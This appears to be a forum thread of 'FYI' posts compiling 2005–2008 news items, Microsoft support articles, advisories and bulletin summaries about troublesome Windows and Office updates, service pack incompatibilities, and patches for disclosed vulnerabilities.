FYI...good reason to be "selective" when doing "Windows Updates"...

- http://support.microsoft.com/?kbid=890830
Last Review: November 24, 2005
Revision: 15.2
"...Known issues in the November 8, 2005 release
When you run the November 8, 2005 release of the Windows Malicious Software Removal Tool from Windows Update, from Automatic Update, or from the Download Center, the tool may appear to stop responding. Additionally, you may experience one of the following symptoms:
• When you run the tool from Windows Update or from Automatic Update, Windows Task Manager shows that the Iexplore.exe process has high CPU usage.
• When you run the tool from the Download Center, Windows Task Manager shows that the Mrt.exe process has high CPU usage.
To resolve this issue, install the updated version of the Windows Malicious Software Removal Tool that is now available from Windows Update, from Microsoft Update, from Automatic Updates, or from the Download Center. An updated version of the Windows Malicious Software Removal Tool was released on November 11, 2005.
>>> http://tinyurl.com/83c52

:(

FYI...

MS Office2003 SP3 disables older file formats
- http://it.slashdot.org/it/08/01/01/137257.shtml
January 02, 2008 - "In Service Pack 3 for Office 2003, Microsoft disabled support for many older file formats. If you have old Word, Excel, 1-2-3, Quattro, or Corel Draw documents, watch out! They did this because the old formats are 'less secure', which actually makes some sense, but only if you got the files from some untrustworthy source. Naturally, they did this by default, and then documented a mind-bogglingly complex workaround (KB 938810*) rather than providing a user interface for adjusting it, or even a set of awkward 'Do you really want to do this?' dialog boxes to click through. And of course because these are, after all, old file formats ... many users will encounter the problem only months or years after the software change, while groping around in dusty and now-inaccessible archives."
* http://support.microsoft.com/kb/938810/en-us
Last Review: December 6, 2007
Revision: 2.0

:nono::crazy:
------------------------------

- http://preview.tinyurl.com/2h5md8
January 05, 2008 (Computerworld) - "Microsoft Corp. apologized to a software rival yesterday for saying its file format posed a security risk and issued new tools to let users of Office 2003 SP3 unblock a host of barred file types. In a posting to his own blog*, David LeBlanc, a senior software development engineer with the Microsoft Office team, admitted the company's mistake in blaming insecure file formats, including the one used by CorelDraw... The revised support document** lists four downloads that users can run to unblock Word, Excel, PowerPoint and Corel files... "We'll try harder to make enabling older formats much more user-friendly in the future," he said."

* http://blogs.msdn.com/david_leblanc/archive/2008/01/04/office-sp3-and-file-formats.aspx
"...The .reg files you can use to change the security settings can be downloaded here..."

** http://support.microsoft.com/kb/938810/en-us
Last Review: January 4, 2008
Revision: 3.0
------------------------------
- http://preview.tinyurl.com/2gkwxt
January 10, 2008 (Computerworld) - "Microsoft Corp. will not post new tools that would allow users of Office 2007 to access blocked file formats, as it has done for customers running Office 2003 Service Pack 3 (SP3). It cited a lack of interest in such tools and said existing work-arounds accomplish the same thing... the Office Web site* explains how to set up a "trusted location," a special folder on a local or network drive. Files in a trusted folder aren't checked by Office 2007's security tools before opening, and thus the older file formats open normally..."
* http://office.microsoft.com/en-us/help/HA100319991033.aspx

:clown:

FYI...

Vista SP1 Blocks AV Programs
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=206801120
Feb. 21, 2008 - "A major update to Microsoft's Windows Vista operating system could leave computers vulnerable to hackers and malware as the service pack prevents several widely used antivirus programs from operating, the company said. The list of security products that Windows Vista Service Pack 1 blocks includes Zone Alarm Security Suite 7.1, Trend Micro Internet Security 2008, and BitDefender 10. It also blocks the 2008 version of the Jiangmin antivirus product. Microsoft said the blocks occur because the antivirus programs are not compatible with Vista SP1. "For reliability reasons, Microsoft blocks these programs from starting after you install Windows Vista SP1," the company said in a statement posted Wednesday on its support Web site*..."
* http://support.microsoft.com/kb/935796
Last Review: February 22, 2008
Revision: 3.0

:lip:

FYI...

Vista SP1 Survival Guide
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=205917537
March 4, 2008


.

FYI...

Vista SP1 Chokes On Widely Used Intel Chipset Drivers
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=206904946
March 20, 2008 - "PCs from Hewlett-Packard, Gateway, Lenovo, and other major computer makers that contain a widely used Intel chipset can't be upgraded to Windows Vista Service Pack 1 if they're running certain drivers. Microsoft has said that Vista SP1 won't work with "a small number of device drivers." The list, however, includes drivers for an Intel chipset that's found in thousands of PCs and laptops. The affected chipset is Intel's 945G Express series, which is used in computers from virtually all major system vendors. It's also found on standalone motherboards sold by Asus. The 945G Express chipset driver versions between numbers 7.14.10.1322 and 7.14.10.1403 won't work with Vista SP1, according to Microsoft. Chipsets provide a connection point for all key subsystems within a PC. The 945G Express chipset includes Intel's GMA 950 graphics core, which also won't work with Vista SP1 if those drivers are used. Microsoft is urging Vista users to update all of their hardware to the latest drivers before even attempting to install SP1... The service pack also won't work with computers that use certain, widely-deployed audio drivers from Realtek and certain drivers for security devices manufactured by Symantec. Microsoft has published a full list of drivers that are incompatible with the service pack*. Meanwhile, Microsoft is continuing to receive reports from computer users who say Vista SP1 is wreaking havoc on their systems..."
* http://support.microsoft.com/?kbid=948343#method5
Last Review: March 20, 2008
Revision: 3.0

('Shades of the XPSP2 installs... 'Like Yogi said, "It's deja vu all over again"...)

:fear:

FYI...

- http://preview.tinyurl.com/5vu4aw
April 23, 2008 (Infoworld) -"...Vista Service Pack 1 will download automatically to PCs that have the automatic update feature of the OS turned on, the company said. Previously, Vista was available to customers via Windows Update, but people had to specifically download it. Not all customers will receive SP1 immediately via Automatic Update, however. The company is distributing it in phases to "ensure a seamless download experience," Microsoft said. A timeline for when all customers would receive Vista SP1 via Automatic Update was not immediately available..."

- http://support.microsoft.com/?kbid=948343
Last Review: April 23, 2008
Revision: 7.0...

FYI...

- http://isc.sans.org/diary.html?storyid=4358
Last Updated: 2008-04-29 17:03:11 UTC - "...the Windows Service Pack blocker tool can now block the following service packs from installation...
* Windows XP Service Pack 3 (valid for 12 months following general availability)
* Windows Vista Service Pack 1 (valid for 12 months following general availability)
So, if you want to prevent your machines from automatic updates (provided you don't use WSUS), you can download this handy tool from here*..."
* http://preview.tinyurl.com/2uryvq
Windows Service Pack Blocker Tool Kit
Quick Details
File Name: SPBlockerTools.EXE
Version: SPBlockerToolKit
Date Published: 12/6/2007
Language: English
Download Size: 96 KB

:spider:

FYI...

Windows Vista SP1 Disaster Recovery Guide
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207402843
May 6, 2008


.

FYI...

- http://isc.sans.org/diary.html?storyid=4387
Last Updated: 2008-05-06 20:10:06 UTC - "Microsoft, it appears, has just released Windows XP Service Pack 3*. For the most part, it is a bundle of all the updates since Service Pack 2, but there are some key differences.
First, the big gotcha:
- If you are an IE 6 user, SP3 will simply updated your IE 6 installation. You will continue to be able to upgrade to IE 7 as an option.
- If you are an IE 7 user, it will update your IE 7 installation. HOWEVER, you will NOT be able to go back to IE 6 after applying this service back.
- If you are an IE 8 (beta) user, you will need to uninstall IE 8, apply the service pack, and then reinstall IE 8.
This link** has a list of all the Knowledge Base articles that this service pack addresses. Some of the bigger notes is that it does retrofit some of the Vista functionality into XP, namely in the area of Network Access Protection, Black Hole Router Detection, enhanced security for administrator and service policy entries (basically some better default settings) and a kernel mode crypto driver. Additionally, some of the "optional" updates released since SP2 will be installed with SP3 (MMC 3.0, MXSXML6, WPA2 support, etc). The good news is that TechNet provides installation media that can be used to slipstream install the service pack so workstations can be updated off the net."

Windows XP SP3 Network Installation Package for IT Professionals and Developers
* http://preview.tinyurl.com/6k9zo3
316.4 MB
"...Note: Customers running Microsoft Dynamics Retail Management System (RMS) are advised to install a hotfix for a Microsoft Dynamics RMS issue -prior- to installing Windows XP SP3. http://support.microsoft.com/kb/951937
DO NOT CLICK DOWNLOAD IF YOU ARE UPDATING JUST ONE COMPUTER: A smaller, more appropriate download is now available on Windows Update..."

Release notes for Windows XP Service Pack 3
** http://support.microsoft.com/kb/936929
Last Review: May 6, 2008
Revision: 5.0...

:fear:

FYI...

XP SP3 crashes AMD machines
- http://www.theinquirer.net/gb/inquirer/news/2008/05/09/xp-sp3-crashes-amd-machines
9 May 2008 - "...Windows XP, Service Pack 3, is giving owners of machines with AMD hardware headaches aplenty it seems. The problems, which first arose just one day after the push, have been causing lots of noise on Microsoft support sites and angry user bogs. One user reported, "I just installed Windows XP SP3 and after completing the processes and when the system reboots, the system cannot proceed to load the Windows. It just displays the flash screen of Windows then after it reboots again." Angry users have also reported that, after the installation, it is not even possible to boot in safe mode, usually the last resort before setting up a repeated forehead/screen interface... there appears to be two separate problems. One affects only AMD-equipped PCs sold by Hewlett-Packard. "The problem is that HP, apparently along with other OEMs, deploys the same image to Intel-based computers that they do to AMD-based computers," said Johansson. "Because the image for both Intel and AMD is the same all have the intelppm.sys driver installed and running. That driver provides power management on Intel-based computers. On an AMD-based computer, amdk8.sys provides the same functionality." There's a whole bunch of other info and some useful fixes for those of you stuck in the dreaded loop of death over on Jesper's Bog*."
* http://preview.tinyurl.com/6zs52d
(MSinfluentials.com/blogs/jesper)

:sad::trample::thud:

HP - AMD - XPSP3...

XP SP3 Upgrade Utility for systems with AMD processors
- http://preview.tinyurl.com/4g2b6y
Release Date: 2008-05-14 - Version: 1.0 (HP Customer Care)
Description: Microsoft Windows XP SP3 Upgrade Utility prevents continuous system restarts or "Stop: 0x0000007E" errors after upgrading to Windows XP SP3 on systems with AMD processors.
Fixes: Prevents a condition from occurring that causes continuous system restarts or "Stop: 0x0000007E" errors after upgrading to Microsoft Windows XP Service Pack 3 on systems with an AMD processor.
Example: "A problem has been detected and Windows has been shut down to prevent damage to your computer..."

Download: sp37394.exe (1.85M)

.

FYI...

XPSP3 chokes on ISP versions of IE7
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207801330
May 20, 2008 - "Private label versions of Microsoft's Internet Explorer 7 browser, including those provided to customers by Internet Service Providers Comcast and Qwest, are prone to crash during installation on computers running Windows XP SP3 because they tend to be outdated, Microsoft is warning. The problem generally occurs when a so-called "branded" version of IE7 is installed for the first time on a computer that's running XP SP3, said Microsoft program manager Jane Maliouta, in a blog post*. "The reason is that the IE7 package you are trying to install uses old IE7 files," said Maliouta. The trouble? Some ISPs are still distributing versions of IE7 that don't contain updates designed to make the browser compatible with Windows XP SP3. Specifically, XP3 runs a version of an essential dynamic-link library file called XMLLite.dll that's not compatible with versions of IE7 released prior to October..."
* http://preview.tinyurl.com/6rwwf8
May 12, 2008 (blogs.msdn.com)

:fear:

FYI...

- http://windowssecrets.com/comp/080529#patch0
2008-05-29 - "Antivirus software from Symantec Corp. may cause the installation of Service Pack 3 for XP to corrupt the Windows Registry by adding unnecessary keys.
Symantec advises users to disable the SymProtect security feature of its products before applying XP SP3.
A Registry fix is needed by the latest XP patch..."

(More detail at the URL above.)

:fear:

FYI...

PCpitstop XPSP3 review:
- http://preview.tinyurl.com/4y7zqc
May 25, 2008 - Windows XP SP3 Issues and Fixes Continued


:sad:

FYI...

MS08-030 - new patch, for XPSP2 & XPSP3
- http://isc.sans.org/diary.html?storyid=4600
Last Updated: 2008-06-20 01:20:41 UTC - "Microsoft issued a new patch, for XPSP2 & XPSP3, for MS08-030*: Vulnerability in Bluetooth stack could allow remote code execution. "Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update. Customers running Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 and all supported versions of Windows Vista who have already applied these original security updates do not need to take any further action"... The Technet Security Vulnerability Research & Defense blog** on the vulnerability was "MS08-030: All bark and no bite? The case of the Bluetooth update".
Related update- KB KB951376 Security Update for Windows XP:
http://support.microsoft.com/kb/951376/en-us ..."
Last Review: June 19, 2008
Revision: 2.0

* http://www.microsoft.com/technet/security/bulletin/ms08-030.mspx
Revisions:
• V1.0 (June 10, 2008): Bulletin published.
• V2.0 (June 19, 2008): Added "Why was this security update reoffered on June 19, 2008?" entry to the Update FAQ to advise customers running Windows XP Service Pack 2 and Windows XP Service Pack 3 that a revised version of the security update is available.
"...Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update..."

** http://preview.tinyurl.com/67t4uw
(blogs.technet.com)

:fear:

FYI...

Microsoft Security Advisory (954462)
Rise in SQL Injection Attacks Exploiting Unverified User Data Input
- http://www.microsoft.com/technet/security/advisory/954462.mspx
June 24, 2008 - "Microsoft is aware of a recent escalation in a class of attacks targeting Web sites that use Microsoft ASP and ASP.NET technologies but do not follow best practices for secure Web application development. These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.
Mitigating Factors:
This vulnerability is not exploitable in Web applications that follow generally accepted best practices for secure Web application development by verifying user data input...
(See) Suggested Actions..."
• Detection – HP Scrawlr - http://preview.tinyurl.com/4qkk6g ...
• Defense – UrlScan - http://learn.iis.net/page.aspx/473/using-urlscan
• Identifying - Source Code Analyzer for SQL Injection - http://support.microsoft.com/kb/954476
• Additional Info...

Microsoft SQL Injection Prevention Strategy
- http://isc.sans.org/diary.html?storyid=4621
Last Updated: 2008-06-24 22:17:41 UTC - "...Microsoft recommends three approaches to help mitigate SQL Injection.
• Runtime scanning...
• URLScan...
• Code Scanning..."

- http://atlas.arbor.net/briefs/index#361782669
June 25, 2008 - "Microsoft today released security tools to help customers deal with SQL Injection Attacks. UrlScan, Microsoft Source Code Analyzer for SQL Injection and Scrawlr can be used by customers to check for SQL Injection issues in their applications.
Analysis: The release of these tools comes in a time when SQL injection is increasingly exploited. UrlScan is used to restrict HTTP requests that IIS will process."
* http://preview.tinyurl.com/5t2sbh
(blogs.technet.com)

:fear:

FYI...

Device Manager may not show any devices and Network Connections may not show any network connections after you install Windows XP Service Pack 3 (SP3)
- http://support.microsoft.com/?kbid=953979
Last Review: June 25, 2008
Revision: -4.2-
SYMPTOMS:
After you install Windows XP Service Pack 3 (SP3), Device Manager may not show any devices and Network Connections may not show any network connections.
This problem may occur when an antivirus application is running during the installation of Windows XP SP3.
CAUSE
This problem occurs when the Fixccs.exe process is called during the Windows XP SP3 installation. This process creates some intermediate registry subkeys, and it later deletes these subkeys. In some cases, some antivirus applications may not let the Fixccs.exe process delete these intermediate registry subkeys.
When this problem occurs, certain applications, such as Device Manager and Network Connections, may be unable to enumerate the device or the connection instances. These applications will report a blank status even though devices and connections still function as expected.
RESOLUTION
Hotfix information:
The following file is available for download from the Microsoft Download Center:
Download the Update for Windows XP (KB953979) package now:
- http://preview.tinyurl.com/3jgjap
File Name: WindowsXP-KB953979-x86-ENU.exe
Download Size: 64 KB...
Prerequisites:
To use this hotfix, you must have Windows XP Service Pack 3 installed on the computer...
Restart requirement:
To apply this hotfix, you must restart the computer in Safe Mode..."

Steps to take -before- you install Windows XP Service Pack 3
- http://support.microsoft.com/kb/950717/
Last Review: May 21, 2008 - Revision: 3.0 - "...Important
• If the configuration of your antivirus software prevents certain system files from being changed, the Windows XP SP3 installation may fail. Try temporarily disabling your antivirus software. To do this, right-click your antivirus program icon, and then click Disable. This icon typically appears in the lower right corner of the computer screen.
• If you disable your antivirus software before you install Windows XP SP3, make sure that you know the risks that are involved, and make sure that you enable the antivirus software after Windows XP SP3 is installed..."

:fear:

FYI...

Microsoft Security Advisory (954960)
Microsoft Windows Server Update Services (WSUS) Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954960.mspx
June 30, 2008 - "Microsoft is investigating public reports of a non-security issue that prevents the distribution of any updates deployed through Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1 to client systems that have Microsoft Office 2003 installed in their environment. Microsoft is aware of reports from customers who are experiencing this issue. Upon completing the investigation, Microsoft will take appropriate action to resolve the issue within Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1.

Note: The issue affecting System Center Configuration Manager 2007 first described in Microsoft Security Advisory 954474, where System Center Configuration Manager 2007 systems were blocked from deploying security updates, is separate from the issue described in this advisory.
Mitigating Factors:
• This issue is limited to customers who deploy updates through Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1, and have Microsoft Office 2003 installed in their environments..."

- http://preview.tinyurl.com/6xdp79
June 30, 2008 (MSRC blog)

:fear::spider:

FYI...

Microsoft Security Advisory (955179)
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution
- http://www.microsoft.com/TechNet/security/advisory/955179.mspx
July 7, 2008 - "Microsoft is investigating active, targeted attacks leveraging a potential vulnerability in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. The ActiveX control for the Snapshot Viewer for Microsoft Access enables you to view an Access report snapshot without having the standard or run-time versions of Microsoft Office Access. The vulnerability only affects the ActiveX control for the Snapshot Viewer for Microsoft Office Access 2000, Microsoft Office Access 2002, and Microsoft Office Access 2003. The ActiveX control is shipped with all supported versions of Microsoft Office Access except for Microsoft Office Access 2007. The ActiveX control is also shipped with the standalone Snapshot Viewer...
Suggested Actions / Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, this is stated in the entry.
• Prevent COM objects from running in Internet Explorer
You can disable attempts to instantiate a COM object in Internet Explorer by setting the kill bit for the control in the registry..."

(Kill bit listings shown in the advisory at the URL above.)

:fear:

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jul.mspx
July 8, 2008 - "This bulletin summary lists security bulletins released for July 2008...

Important (4)

Microsoft Security Bulletin MS08-040
Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
- http://www.microsoft.com/technet/security/bulletin/ms08-040.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows, Microsoft SQL Server...

Microsoft Security Bulletin MS08-038
Vulnerability in Windows Explorer Could Allow Remote Code Execution (950582)
- http://www.microsoft.com/technet/security/bulletin/ms08-038.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-037
Vulnerabilities in DNS Could Allow Spoofing (953230)
- http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-039
Vulnerabilities in Outlook Web Access for Exchange Server Could Allow Elevation of Privilege (953747)
- http://www.microsoft.com/technet/security/bulletin/ms08-039.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

-
ISC Analysis
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-08 18:22:23 UTC
---

MS08-038 exploit/fix available
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-08 18:22:23 UTC
"...MS08-038 - Multiple vulnerabilities in Windows explorer allow code execution with the rights of the logged on user... Publicly disclosed... CVE-2008-0951* is a well known vulnerability: CERT VU#889747** (march 2008)..."
- http://www.microsoft.com/technet/security/bulletin/ms08-038.mspx
July 8, 2008
* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0951
Last revised: 3/25/2008
** http://www.kb.cert.org/vuls/id/889747
First Published 03/20/2008
---
Updated / CVE references:
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-09 08:21:40 UTC ...(Version: 3)
MS08-037: Windows DNS
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1454
MS08-038: Windows explorer / Vista
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1435
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0951
MS08-039: Exchange server
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2247
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2248
MS08-040: SQL server
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0085
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0086
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0106
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0107

//

:fear:

FYI... updated:

- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-09 08:21:40 UTC ...(Version: 3)
"...MS08-037 - Windows DNS ...ZoneAlarm users report* trouble with their firewall set to "high" for the Internet zone..."

Update - Important! - see: http://forums.spybot.info/showpost.php?p=211128&postcount=78 -prior- to MS08-037 install.

** http://support.microsoft.com/?kbid=951748
MS08-037 ...Windows XP... (client side)

//

FYI...

- http://www.theinquirer.net/gb/inquirer/news/2008/07/09/windows-xp-sp3-automatic
9 July 2008 - "AS ANNOUNCED previously by Microsoft, automatic updates for Windows XP SP3 will be launched Wednesday, July 10 2008, starting at 10:00 am Pacific Time. For most Windows XP users who haven't already manually downloaded and applied SP3, the automatic update process should work properly. After all, Microsoft has had almost three months to test, tweak and polish it since it was first released. Microsoft's Automatic Updates process should know about and scan for configurations that are problematic, and prevent the Windows XP SP3 update installation process from proceeding if it detects a troublesome situation. However, if there's any hiccough in the automatic update process, your computer could become unusable. Therefore, certain technical advisors recommend using Microsoft's Automatic Updates facility only to provide notification that the update is available, then applying it manually. They caution that you should also take care to follow Microsoft's service pack pre-installation instructions, including:
* Disable antivirus programs,
* Make sure no other applications are running,
* Have your system plugged in during the update, that is, not on battery power, and
* Make sure that you have sufficient free space available on your system's hard disk.
You can make certain that the Windows Automatic Update facility doesn't attempt to, er... automatically update your system by using Microsoft's Windows Service Pack Blocker Tool Kit, and that's available here: http://preview.tinyurl.com/2tadkt
Should you find that Windows XP SP3 causes problems on your system, instructions on how to remove it are available here: http://www.iaps.com/blog/2008/07/how-to-remove-windows-xp-service-pack-3.html ..."

//

FYI...

- http://blogs.technet.com/msrc/archive/2008/07/10/revision-for-ms08-037.aspx
July 10, 2008 (MSRC) - "...After the release of MS08-037, we became aware of reports of ZoneAlarm customers experiencing issues after applying the security updates. We started investigating these reports as soon as we heard about them and have been working to research this issue. We’re still working on this issue but we do have some information from our investigation so far, which we’ve put into the bulletin. Specifically, we’ve identified that customers who are running either ZoneAlarm or Check Point Endpoint Security (previously named Check Point Integrity) who apply MS08-037 may lose network connectivity after applying these updates. Our investigation so far has shown that no other customers are affected by this issue. We’re still investigating this issue but we encourage customers who are using ZoneAlarm to review the appropriate ZoneAlarm Web site** and Check Point Endpoint customers to review the appropriate Check Point Web site*** for the latest guidance or software updates and factor this information into your risk assessment, testing, and deployment planning..."

* http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
• V2.0 (July 10, 2008): Bulletin revised to inform users of ZoneAlarm and Check Point Endpoint Security of an Internet connectivity issue detailed in the section, Frequently Asked Questions (FAQ) Related to this Security Update. The revision did -not- change the security update files in this bulletin, but users of ZoneAlarm and Check Point Endpoint Security should read the FAQ entries for guidance.

** http://download.zonealarm.com/bin/free/pressReleases/2008/LossOfInternetAccessIssue.html
Last Revised : 14 July 2008

*** https://supportcenter.checkpoint.com/supportcenter/index.jsp

//

FYI...

- http://securitylabs.websense.com/content/Blogs/3148.aspx
08.01.2008 - "...We've been closely monitoring this exploit since its release, and are now tracking several hundred occurrences in the wild, found mostly in China. There is currently no patch available, but Microsoft has several workarounds listed in their advisory. We recommend setting the killbit for this ActiveX control on all workstations where it is installed.
Vulnerable ActiveX CLSIDs:
* F0E42D50-368C-11D0-AD81-00A0C90DC8D9
* F0E42D60-368C-11D0-AD81-00A0C90DC8D9
* F2175210-368C-11D0-AD81-00A0C90DC8D9
This vulnerability is a simple design flaw, and does not require any complicated exploit code. Attackers are able to compromise remote systems simply by calling methods provided by the Snapshot Viewer ActiveX control. This is very similar to the November 9, 2005 ADODB.Stream vulnerability, which was widely taken advantage of because it was easy to exploit. Luckily, the vulnerable ActiveX control does NOT appear in a default Microsoft Windows installation. It does appear, however, to be included by default with Microsoft Office 2000 - 2003."

- http://www.symantec.com/security_response/threatconlearn.jsp
"The ThreatCon is at level 2. On August 1, 2008, a new attack vector for the Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability (BID 30114) was identified being exploited in the wild. This vulnerability is currently unpatched. Microsoft Access ActiveX Control Arbitrary File Download Vulnerability ( http://www.securityfocus.com/bid/30114 ) Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access ( http://www.microsoft.com/technet/security/advisory/955179.mspx ) The new attack vector allows an attacker to install a vulnerable version of the ActiveX control on target systems that did not originally contain the associated software. This is possible because the control is digitally signed and marked safe for scripting by Microsoft. This is known to affect users of Internet Explorer 6. Note that Internet Explorer 7 requires user interaction to confirm the installation of the ActiveX control. As a result of this discovery, we urge all Microsoft Windows users, even those whose systems do not currently have the vulnerable control installed, to set the kill bit on the three CLSIDs associated with Snapshot Viewer.
F0E42D50-368C-11D0-AD81-00A0C90DC8D9
F0E42D60-368C-11D0-AD81-00A0C90DC8D9
F2175210-368C-11D0-AD81-00A0C90DC8D9
For instructions on how to set the kill bit on an ActiveX control, please see the following article: Microsoft Knowledge Base Article 240797 (Microsoft) Microsoft ( http://support.microsoft.com/kb/240797 )."

:fear:

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-aug.mspx
August 12, 2008 - "This bulletin summary lists security bulletins released for August 2008..." (Total 11)

Critical (6)

Microsoft Security Bulletin MS08-046
Vulnerability in Microsoft Windows Image Color Management System Could Allow Remote Code Execution (952954)
- http://www.microsoft.com/technet/security/bulletin/MS08-046.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-045
Cumulative Security Update for Internet Explorer (953838)
- http://www.microsoft.com/technet/security/bulletin/MS08-045.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-041
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617)
- http://www.microsoft.com/technet/security/bulletin/MS08-041.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-043
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (954066)
- http://www.microsoft.com/technet/security/bulletin/MS08-043.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-051
Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (949785)
- http://www.microsoft.com/technet/security/bulletin/MS08-051.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-044
Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution (924090)
- http://www.microsoft.com/technet/security/bulletin/MS08-044.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (5)

Microsoft Security Bulletin MS08-047
Vulnerability in IPsec Policy Processing Could Allow Information Disclosure (953733)
- http://www.microsoft.com/technet/security/bulletin/MS08-047.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-049
Vulnerabilities in Event System Could Allow Remote Code Execution (950974)
- http://www.microsoft.com/technet/security/bulletin/MS08-049.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-048
Security Update for Outlook Express and Windows Mail (951066)
- http://www.microsoft.com/technet/security/bulletin/MS08-048.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Outlook Express, Windows Mail...

Microsoft Security Bulletin MS08-050
Vulnerability in Windows Messenger Could Allow Information Disclosure (955702)
- http://www.microsoft.com/technet/security/bulletin/MS08-050.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Windows Messenger...

Microsoft Security Bulletin MS08-042
Vulnerability in Microsoft Word Could Allow Remote Code Execution (955048)
- http://www.microsoft.com/technet/security/bulletin/MS08-042.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4876
Last Updated: 2008-08-12 19:06:35 UTC

---
Revised (4):

Microsoft Security Bulletin MS08-022 – Critical
Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
- http://www.microsoft.com/technet/security/Bulletin/MS08-022.mspx
• V2.0 (August 12, 2008): Added known issues link. Also added an entry to the section, Frequently Asked Questions (FAQ) Related to this Security Update, about the known issues and solutions. The solutions include a deployment change for this security update for one issue and a workaround for another. Customers who have successfully updated their systems do not need to reinstall this update.

Microsoft Security Bulletin MS08-033 – Critical
Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)
- http://www.microsoft.com/technet/security/Bulletin/MS08-033.mspx
• V2.1 (August 12, 2008): Added known issues link. Also added an entry to the section, Frequently Asked Questions (FAQ) Related to this Security Update, about the known issues and solutions. The solutions include a change to Microsoft Baseline Security Analyzer (MBSA) 2.1 to correctly detect this update.

Microsoft Security Bulletin MS07-047 - Important
Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782)
- http://www.microsoft.com/technet/security/Bulletin/MS07-047.mspx
• V2.0 (August 12, 2008): Added Windows XP Service Pack 3 as affected software. This is a detection change only; there were no changes to the binaries. Customers who have successfully updated their systems do not need to reinstall this update.

Microsoft Security Bulletin MS08-040 – Important
Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
- http://www.microsoft.com/technet/security/Bulletin/MS08-040.mspx
